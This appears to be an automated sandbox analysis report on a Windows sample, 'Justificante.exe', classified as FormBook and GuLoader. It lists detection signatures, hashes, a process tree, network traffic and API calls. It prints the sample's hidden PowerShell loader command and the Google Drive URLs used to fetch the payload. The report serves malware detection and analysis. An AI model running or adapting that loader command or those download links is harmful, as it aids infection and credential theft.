Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Justificante.exe

Overview

General Information

Sample name:Justificante.exe
Analysis ID:1539381
MD5:73fd5954cb5be48ea11d738097fdda5a
SHA1:6aab0cb9ddb07d3c3386e6ff72c2f969339e31f7
SHA256:27d88a843003bf67d0bf917db5a57620810b08c76c91e18d00c3d89c7d459545
Tags:exeuser-malwarelabnet
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Justificante.exe (PID: 1796 cmdline: "C:\Users\user\Desktop\Justificante.exe" MD5: 73FD5954CB5BE48EA11D738097FDDA5A)
    • powershell.exe (PID: 3892 cmdline: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Apathism.exe (PID: 4512 cmdline: "C:\Users\user\AppData\Local\Temp\Apathism.exe" MD5: 73FD5954CB5BE48EA11D738097FDDA5A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), CommandLine: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante.exe", ParentImage: C:\Users\user\Desktop\Justificante.exe, ParentProcessId: 1796, ParentProcessName: Justificante.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), ProcessId: 3892, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-22T16:04:30.150097+020028032702Potentially Bad Traffic192.168.2.949713142.250.184.238443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Justificante.exeAvira: detected
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeAvira: detection malicious, Label: TR/Agent.lfkxa
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeReversingLabs: Detection: 39%
      Source: Justificante.exeReversingLabs: Detection: 39%
      Source: Yara matchFile source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Justificante.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.9:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49715 version: TLS 1.2
      Source: Justificante.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147024134.0000000006D2D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb? source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: Binary string: wntdll.pdb source: Apathism.exe
      Source: Binary string: System.Core.pdb" source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 142.250.184.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: Justificante.exe, 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Justificante.exe, 00000000.00000000.1417744480.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Apathism.exe, 00000007.00000000.2138832756.000000000040A000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: powershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mhi
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mhw
      Source: Apathism.exe, 00000007.00000003.2563435185.00000000066D8000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000002.2600695296.00000000066D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2563282509.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download%F
      Source: powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.9:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49715 version: TLS 1.2
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Apathism.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_22372C70
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_22372DF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223735C0 NtCreateMutant,LdrInitializeThunk,7_2_223735C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22374340 NtSetContextThread,7_2_22374340
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22374650 NtSuspendThread,7_2_22374650
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AB0 NtWaitForSingleObject,7_2_22372AB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AF0 NtWriteFile,7_2_22372AF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AD0 NtReadFile,7_2_22372AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372B60 NtClose,7_2_22372B60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BA0 NtEnumerateValueKey,7_2_22372BA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372B80 NtQueryInformationFile,7_2_22372B80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BF0 NtAllocateVirtualMemory,7_2_22372BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BE0 NtQueryValueKey,7_2_22372BE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372E30 NtWriteVirtualMemory,7_2_22372E30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372EA0 NtAdjustPrivilegesToken,7_2_22372EA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372E80 NtReadVirtualMemory,7_2_22372E80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372EE0 NtQueueApcThread,7_2_22372EE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F30 NtCreateSection,7_2_22372F30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F60 NtCreateProcessEx,7_2_22372F60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FB0 NtResumeThread,7_2_22372FB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FA0 NtQuerySection,7_2_22372FA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F90 NtProtectVirtualMemory,7_2_22372F90
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FE0 NtCreateFile,7_2_22372FE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C00 NtQueryInformationProcess,7_2_22372C00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C60 NtCreateKey,7_2_22372C60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CA0 NtQueryInformationToken,7_2_22372CA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CF0 NtOpenProcess,7_2_22372CF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CC0 NtQueryVirtualMemory,7_2_22372CC0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D30 NtUnmapViewOfSection,7_2_22372D30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D10 NtMapViewOfSection,7_2_22372D10
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D00 NtSetInformationFile,7_2_22372D00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DB0 NtEnumerateKey,7_2_22372DB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DD0 NtDelayExecution,7_2_22372DD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373010 NtOpenDirectoryObject,7_2_22373010
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373090 NtSetValueKey,7_2_22373090
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223739B0 NtGetContextThread,7_2_223739B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373D10 NtOpenProcessToken,7_2_22373D10
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373D70 NtOpenThread,7_2_22373D70
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
      Source: C:\Users\user\Desktop\Justificante.exeFile created: C:\Windows\ansttelsesvilkaaretsJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00406C5B0_2_00406C5B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_070AC6D62_2_070AC6D6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E02747_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C02C07_2_223C02C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FA3527_2_223FA352
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_224003E67_2_224003E6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E3F07_2_2234E3F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D20007_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DA1187_2_223DA118
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223301007_2_22330100
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C81587_2_223C8158
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_224001AA7_2_224001AA
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F81CC7_2_223F81CC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235C6E07_2_2235C6E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223407707_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223647507_2_22364750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233C7C07_2_2233C7C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E44207_2_223E4420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F24467_2_223F2446
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EE4F67_2_223EE4F6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223405357_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_224005917_2_22400591
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA807_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FAB407_2_223FAB40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F6BD77_2_223F6BD7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234A8407_2_2234A840
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223428407_2_22342840
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223268B87_2_223268B8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E8F07_2_2236E8F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223569627_2_22356962
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A07_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2240A9A67_2_2240A9A6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FEE267_2_223FEE26
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340E597_2_22340E59
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352E907_2_22352E90
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FCE937_2_223FCE93
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FEEDB7_2_223FEEDB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22360F307_2_22360F30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E2F307_2_223E2F30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22382F287_2_22382F28
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B4F407_2_223B4F40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BEFA07_2_223BEFA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234CFE07_2_2234CFE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332FC87_2_22332FC8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340C007_2_22340C00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0CB57_2_223E0CB5
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330CF27_2_22330CF2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DCD1F7_2_223DCD1F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234AD007_2_2234AD00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22358DBF7_2_22358DBF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233ADE07_2_2233ADE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223452A07_2_223452A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E12ED7_2_223E12ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235B2C07_2_2235B2C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F132D7_2_223F132D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232D34C7_2_2232D34C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2238739A7_2_2238739A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F70E97_2_223F70E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FF0E07_2_223FF0E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EF0CC7_2_223EF0CC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223470C07_2_223470C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2240B16B7_2_2240B16B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232F1727_2_2232F172
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237516C7_2_2237516C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234B1B07_2_2234B1B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F16CC7_2_223F16CC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FF7B07_2_223FF7B0
